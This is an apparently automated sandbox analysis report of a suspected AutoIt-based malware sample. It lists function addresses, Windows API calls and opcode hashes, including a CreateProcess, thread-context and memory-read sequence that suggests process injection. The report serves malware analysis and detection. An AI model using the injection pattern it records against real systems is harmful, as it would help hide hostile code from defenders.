                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                          • Instruction ID: d08fe22c6a524c27e4c6c7bcf1019f14b9a5eff3fc739cf1d41fcb720108e0a5
                                          • Opcode Fuzzy Hash: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                          • Instruction Fuzzy Hash: 29E092F290071433CD1099219941A87F38C4B15B11F08402AFA15A3301E969FA40C1E9
                                          APIs
                                            • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                          • _free.LIBCMT ref: 004295A0
                                            • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                            • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                            • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                            • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                            • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                            • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                          • String ID: >>>AUTOIT SCRIPT<<<
                                          • API String ID: 3938964917-2806939583
                                          • Opcode ID: 270dd0ea9a5e8039f531707175cdd08c3ef27e69020102fad8003a9fe26c702a
                                          • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                          • Opcode Fuzzy Hash: 270dd0ea9a5e8039f531707175cdd08c3ef27e69020102fad8003a9fe26c702a
                                          • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                          Strings
                                          • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _strcat
                                          • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                          • API String ID: 1765576173-2684727018
                                          • Opcode ID: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                          • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                          • Opcode Fuzzy Hash: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                          • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                          • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                          • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                          • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                          APIs
                                          • __wsplitpath.LIBCMT ref: 004678F7
                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                          • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ErrorLast__wsplitpath_malloc
                                          • String ID:
                                          • API String ID: 4163294574-0
                                          • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                          • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                          • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                          • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                          APIs
                                            • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                            • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                            • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                          • _strcat.LIBCMT ref: 0040F786
                                            • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                            • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                          • String ID:
                                          • API String ID: 3199840319-0
                                          • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                          • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                          • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                          • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                          APIs
                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                          • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: FreeInfoLibraryParametersSystem
                                          • String ID:
                                          • API String ID: 3403648963-0
                                          • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                          • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                          • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                          • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                          APIs
                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                          • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                          • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                          • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                          APIs
                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                          • __lock_file.LIBCMT ref: 00414A8D
                                            • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                          • __fclose_nolock.LIBCMT ref: 00414A98
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                          • String ID:
                                          • API String ID: 2800547568-0
                                          • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                          • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                          • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                          • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                          APIs
                                          • __lock_file.LIBCMT ref: 00415012
                                          • __ftell_nolock.LIBCMT ref: 0041501F
                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __ftell_nolock__getptd_noexit__lock_file
                                          • String ID:
                                          • API String ID: 2999321469-0
                                          • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                          • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                          • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                          • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                          APIs
                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 03E81B15
                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03E81B39
                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03E81B5B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1729394429.0000000003E80000.00000040.00000020.00020000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3e80000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                          • String ID:
                                          • API String ID: 2438371351-0
                                          • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                          • Instruction ID: acd79b645258952b99c9e8565ec1810805fd3a579298185df4930ab299947330
                                          • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                          • Instruction Fuzzy Hash: FE12D024E14658C6EB24DF64D8507DEB232EF68300F10A5E9910DEB7A4E77A4F81CF5A
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                          • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                          • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                          • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                          • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                          • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                          • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                          • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                          • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                          • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __lock_file
                                          • String ID:
                                          • API String ID: 3031932315-0
                                          • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                          • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                          • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                          • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                          APIs
                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                          • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                          • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                          • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
